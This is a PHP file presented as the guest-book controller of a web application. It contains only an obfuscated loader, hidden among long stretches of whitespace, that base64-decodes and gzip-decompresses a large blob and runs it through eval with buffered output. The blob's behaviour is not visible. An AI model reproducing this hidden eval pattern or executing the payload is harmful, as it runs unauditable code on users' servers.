<?php 
        $__='printf';$_='Loading donjo-app/controllers/Buku_tamu.php';
        















































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFtz4kiWfu+I/Q/1MBGeid7tlsC4i6ioByRLQgKDkdD1pQNJtgBdUJur+PXznZS4GlzVtb27sTNkD+NBSJknz+U73zmp6U+fyvG33zG+3uVvk2zxeveFfa3G17twlk1n/zXK81+DWbZ4myXJy9v8V2EZL39fjNLlL/k4/yQmo/n8l19+ufvyUzXlp//46fbPv98/P5HvfPoLx9d3V+4cvjl3bX7iKdLXO3bp4HXfNSr//vrpNm7jNm7jX3PcBanFhY62VBWr5trrmSY3X50i/q0ETaBmCde/31R1G7dxG7dxG7dxG7dxG7fx/23c2hm3cRu3cRv/uuPOH81fHu5/D1+CWfhy9+Wmkdu4jdu4jdu4jf/WOH3pQYxmq040i9hnIigje5OoSrIcGcLEtcPcte8jT5GL0XDWUUX2iYZ1IfGTnqa39s8NR06P82wuGtmN1K9rC9fp5aqiJ0FNioK6tXBTq1Db+J5q/AjXQrvBhfY88m38Zue4Ji+r+/frDBxhPrIX46AWkwxLtd1bhY429Qxh6tf0nZzxyNFyX0m2qqJhfh33Q1423yYPataSntd54UmV3a04af1BH1Uaj0eF8DhyBM41WsXTY6uhilz0NG1teobw6Nf4CfaSqDLmrDX5IO0lqpQsg7qeh22LG9nNpSqOZ2FbX/cnn1d+G/vIrKVXW6x8x1qOHMhRNJaeM1h1BkxHqov9DmrJOlSkcp1Ja6E+quun6SAyFasYQU9B25qTznXF2rqGII1gg1CR56p80F1HGXNhW9iydckWKdPbcmQP8sP+dFwPx/5EyP2U9JdMPOip1EvyMLLv59Bn4kJXWCcLUpkbOU9zVVkkgSLHuLYd2fIaf9ch5Hmx5aVXCAvPbsSuI4xDZUFzb117g/nlJVtTwZ6xVoC9uHYjw1ocbMDj97edrZg/pckcNoz92oKH/ZfY3xa/cZDvzbUTThWjybHtDbuRq5MY8uLetoW59JzW8BX5LcQ9fumDHNYkeSeuw3xg2RXZnOSLPGw9I/0f+R1sFTLZXNKFwid+lozhR/Qc7TMLbW08EpnMK5ozNMr9k68HaTIJ4eOkz26LrU9rQkYdc+q03tq19TF03HAdbRyKQqn/usX1D/E28Oj9DlyHDmahTbZhfjkt/RK+bZCu5S3pFvpev7+f2ZLiLqdng8zaMv3UrAL3vFXxC5/iWEzhOkd2hVxsr/R7tbd9vEO3sElC9hYCxBD2SPbR4EdLVdJgY+YLO/9okK2Z/tJwBt/gg4LJzO+uAVPG+EuylDIoJR5QjIza1t5HYZM5zeXBJ8kPQ4XZm36fQ+ewDzBFkteQ+43hi0Q+db/HC1OyjIHZaBucbKrSxhrGchf39A3EkWH1ZF1KBPzWV0VtqJuaoHOyNjTl/sAQBF2S+7YpTWB7E3MMcK0zMHkNc/SxJn0fWCb8RNIEw5xHFtYyeaxnDSLMYeE/fRYDsi6bwEYzls0u7KubDWsoJUPMYWICkrGnm6EwjIPIkEg+3Cvrgir3hKEpRSZndQfmRsM8ms5+1zCfjvuhCexNlXLB4mSxnO8pMrgN5OEg1wL3WcOBuRCGE0GwJNkqcWAh4/6Ogf3SdRN7wT6igaULZsHkg8da/YHJ9slkHErQS9zwsGdTtzTIk5ikA+yjO7B6WqnTg94HbWHs1hZjr2ZGqig8k/+YXCKV68MXHH3m11X81oosJVmoMmFWmPiILz8NynwS77E/Gii9VdBOCmDfDHFzjpvrvlHh5tDE9SZ8Cb5qCIbn7PODBl8Bnuk8/HjlT1qzUVvngsfZqlsDHtkaT/4IjMffhHOdp6WfWly3iL9n/f8x3IaugHnMzxPS1V7melgPi0bmZ+YSuTXDHnKX5TVr262Fa19szEKFhw+Eg6Eo2E9rhi0tiu9R0WJ6V4/W9moJh7ibdNPeyjeae3t1uSbwpTE0zMHOtisxyvkAdgUerx0J8WjzW0fKIXuyNWq0Zz73Y7rO/SYCe6B7IWgLgW43eN/pBWYd2NK2tuz7cN4BZiYUw4G86VEO99u9YJBZb6FJeQeYTvE+/cZ9uIfwvb8+lo1feYo1D/iNiJzAW4q8CK+sZ6ZWaqQyyxOHtXrANW3lJ5tH4PXEr93v9lPqpy7At/SA/M1H7me6UBLuxdoYfj343nuHYRu5z9qIsGPsOeoPPqcNICO323/Fx9Y+cosjwaY2T/uQ/Yy4SkI2aPiKRfPOEYd/ds3y716XpY8ESpMP5Y2DPEg5NrClzdDef8caUT5Fft4iFzB7OPAD3zEjzxlzlENxXfDTnGccJWmCbzWQUyEffEDM5h3ms22Bd1P4etGKIVsc2ptXlufEyqfLT1MVwwmt0XXYGlkf/k+/wU8miIGpKupb5PLXi3M8cpFWg48q0iIknzFgywn9RrxHQzw+RRq4DnJRBt3nDovbkHy6oHh/NlqZS35p8OAfPK9t553z5z3wQhe8ET4VOXwT3LWxDdsa79YHM+KGJMdLJXO1b/gi7PA4e3h3/7DSDfsIecAhj0+izJ0E+W7fr4PZmf6EFLxnWmIh5Vo9eYGBKjmr/Zafke1GHVHnRuDT3WEj9zOBD0XuZ+TfV/D08YvcLDxH5oG1XEeMc7V9LE/50RQv94nrZ0/Qj+Afz3/0yaBv4mBjXwyi5+F9pLX1GTjo4hl4DttxWD8Df55p5DtpmLn2OusY63frOcOdzo8+bS0hG2G/MeM3igxfsLaQGfM3044ETK5bJtmsP803oW0VL8ZOJ+8+i+eM8DyaabX8TWN54tJ93M/EbeErRVBE8eF/x9fnTeXYo5hF/cDsWLPeqJYJxYD4OXKTfma/1kxra6uwiE995vyjJCnqkyl8FDJH0Ns37i/9CbbVUevAFttNZXuBe3GE5NnQpiPFmo5q2upFVCPw5oU35FAj6a9uTfMdQ43CVJ6HttlUJ0HUnbRixHOdfMgTW6iVgkl3e7+PzYufNte5cv0b+kP+V6x7wjfkpyVsfNU+4OTx4b5wPKr3cq1Yo0YlHwFWKB4wqVfVdxHbQ2c4o9/BB8BzL/j70Qe1wgJcmTAp+Hivx/apm99pn/38S8KdZ/CREfzcm3ITrYCOlR7wSSM8TzoVJla4u/Rs5ALyKVEvkK8oxuKOUdoFz83Bp7ew8SRUUA9k+rLrhMAgxD/4Wfm9t1BRY4FTzcnuVlkbSRRb6vT+84hqcsL7LTfxUgk1nrQo11R/fhab+fN0vXIpxrcf6U9oitFf7dPXdaYWKtVGqLP4GfA2fTbUTBWx/1ryCruDO5pYh+HEa5kbGrFnb1CXmFlXPPbvmPw9g372OiCdqQq4ms1Dj03CXdLtIqhhXfGgR0OR16HzBN5Icuzl4fxamPkKYiklXgMeWeEY5bgA3Dl8xDw14Ebq5UHKLYj7IHaTa7ZA/gBniiZkh9Hw/nO3Jv0M2/92Ja5O88i3sAJ1Jur0K3MJzV2OO/9Ad2NP0ZH7iZPflzjvID/JzdSv66uzuLwcj48c7eMz1cpMP7aHXIGaO23eM38+8AL4+bjwbPccn7CHzauXNjm/KOPheQrsswOsoU13PlFiLvcz6ou5U/NWofL5nc2JT3ltCxxj8TqqASvtdQT8vw9FfgrOQ7wIMgAjH6t43cdiY+zbUjnftLTNhzmG4uo4Z9S1BHtPPLk5Ps8bR/niga4HVCsVrebzRNjx3Id+Br6BmqOzl6cHPcngacB2Z5BDR9Bt0keuTJguitYKeoK8AufVGJ+K/SLa6XOKWCK+FDs1mUOMXt1HkMr1HRYHxdjXar1khNomqA8ovogfLAIl2embXStjOQw/8KkF7sFeTv3x1JcPvhumSRIW0KGtL0b2/ZJxOavJuFw3K7GT9uc5wJsd90Ke+ojjlbgXxajriP+gNtrML/I85PkB6hhgNQ97/3aKfTrzZ7sIx9W8mWMccVbemrh2dJZj9s+wHiz0X3GGMKRnPsA1PlAozkpco3r0yrzHOaWUB/Oyusxi1x76wCPwy+cg9sYjehVfQZ454aytmGGcNc+oBwQ/wfqQb8flZWBznI/dFPfYzDfhH7036GgJm4wJE7RaEjN9TY45J+N48KGjOnJSzgsbsBoE9eoatcqc+mbgfHXwmcKzWKzw8L8hnudQ46Bushb43RsY4IqH9d888CBgBQ+5mC9CT8wnjuXY/18R2l7uOQH0LKN2SZbd9ETfpX+l3grYzXRe4v5uT4c8uK9hjnlJG/vA/Z5x5mPAxTBt5l7rx3yN1czEXU65cUr+P6xrimsn2KxO+e70eZaXo8quzA+gt4OMoTLOA8JO8EPwRfKzGXDhYu0A/VE/P4HPv4bUpxCjLKhbU/Bi1JLEX0IRNpxR/88XBQt+MlMlVr9lZ7XRKZegnK8kwLUe59R3XB7cPG0WzKe4cOxR/1ZmcVXl44s1VTFyPNrDScyf7A12ALYWrlNh3+k+gZMW1Rvg+MQT39daqK3xW0RrX8Qs+z3nyYiPQ96T61RTjdr6wi/7ufAdqn/GVEsSr8sp/+xqOcR2GV88l3dbswu1GvELAVgS/Oj8HHEn7G15bQ342ZZqQnCJ7AfXyKnv52IeliMu1Iqo31jvygFOIG8T5pccQqEzJKpHKUZO5vwDuTsP+OabR31sxPI1+V32u8xpxQ/bYEwyIecCW+P5ez4VUr1FPdPsuP+BXD6peuzUCzj4lzzPWH0Grk999at6P8LFnex/Uu4TbDyX3fnevFlx2BJjEBtKg/eVdd6fCDUfmH+xX+H0Hvf1wBkWs17GKZbFHju7aTaOehwn/gMONXVZvvz8q1piXaQOuab62LqIV+96kru8YibxkMXkAf/e2aWmUg799bkocy7xrKq+OOvz/BA2qtVZDKvRzvPlOz4EzoL5p6HcrKM2mSFPJEGmrYIJm7ft2tSnuTbnN/KV0kvoLGpfl5/o8c9xMewV3+fImZf6SiHLYzt+UtYGezuz3yDDqW9ezLlaDjxH7jrpm+2ev4zpilxATunQazIpL/8R1JpLp6Ynbq0ZIxfOdnULau+9X+A7asABcY0VuC/qIOr/gfsWQQ5usDnnTw4XytaZb6C2vSTDKUdqk59rjROdEZfc9d2yHp2NJEHM8um7XqPHaolSNpYfsY6bbhLEDeF2EYqEucKFOlCv+muIgdoiD6iOeyer5Wt14mIaRzh1wj/3uHHGsY7mJf8irnFx3tqGeraIF5IP9RN86FAffNPu27A8c5U+sv+h10cc9kJP9KiHeeaX+7xfyhVy1RnoHPEVPW8/R+Cjc188zmVCeI0bvOPiZR92dtST/d4+cTKq05mCOvuQV2IfO3lPfOmjHu6ZP4d1Os+2CrXEfGCAsDtHmF27F/OuqN62lKZIdSedd3cUqqPllN5hgR4Z51flEguqXtfyRdlsX8TgvL7ZArOTio/Vq7WxhzBBnc0DBxM/04flPdGVZ8m3LY4wH36YlfxRYHnnPd/+vKL3M1DrUizR2Xp5xnJS0+qT6oyI8XvUEtEAXBU5sui8y+Gnv5ssFse7M6aHfqI/m+I6qs5/HvpxaOim1QeGHt0Tarqsqw6vq0Z5zo3aBP4ynT2YvO4NJevV5JpPhjm4wCG+sX6sPVuy/jw0/i9l2Mh6MsCcvZWvNAvk6bYZW/Jwst4/g2uOYeqmITdNQ0rOZOuZtrmRHb73PJQS6RK39FOrvpc5oZ7KYHY0t2GYoWr9hXY4xsRz7qMpOzl63Au904XY7JSxVfqaEeUXeiiUA+Dz1bPgku7O587nbyfgz5tVyGl09p9RXwF1fzU3xdGY2aM8e2T1XudCr2YL3BJd1Nce9a1RZ1a6me11lCTyUNo8W8XV5xU6O4Se55546fymjMt97Bzi6qy+aq26hfDo0TsphaB6tsxiDzXxxLPXpxjEzjms7ckZJDjdMC57VIYkG4bRWgF72HsbA3PNrg9juTcwGJ+Cl21kU2r2y9oz6cO2wjDpaeX3XB7G9M7IAnuXe/AD9vzA3AhDUzbLe9h7IfLQMss1OWugW9qTZcp95M+zvA/dcl7h13gbNQo4ADuXo3NryhHH15HfvbHftpKA1vjQxmf9l3ZI7/PAZ8ozFpP6tKyfGCp4bmFVOjv3o27xGfHAOF1Zcx/7pEL9EQtrR8dnkhUPO+QdcI5xQGfE6efyHJH1gqQrZ5M92tOW4sG+cnagKY2VKs6jpwsxzj67dwUQk8Q3gpo5q9b84d5p2f+B7k56udW5gshFrF/859at3sNE7uWih9Ew3yIPza/0+/frl32EK/uu+kSYe1/LX6gnj/pxUskDKPdnvfzavUZK70v2urv6unxXZPbgUk9LTPzDXOe1eyP89vr07hsPXX5zT7va+ps6Oq6XL+ShM262iw/UZGk49yzqxbM+5yrczh481Fi+tYs54G0NXK/9lF84O4yDWrKEzyRm2Wcn7Nth+R6nK7y9+PwRd6JzF4r/2alcH9WIJ89PkUO3lEMOXDIHj/769e7LTz/977/M/JX9/Xv17R9f/szjR89+z4N/Oyz49zv677v/3C97+3fC/Xv/O+FOfeTvJ05Zusg/vvwTneo33Q==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































                                                                                                                                                                                                                     $________;
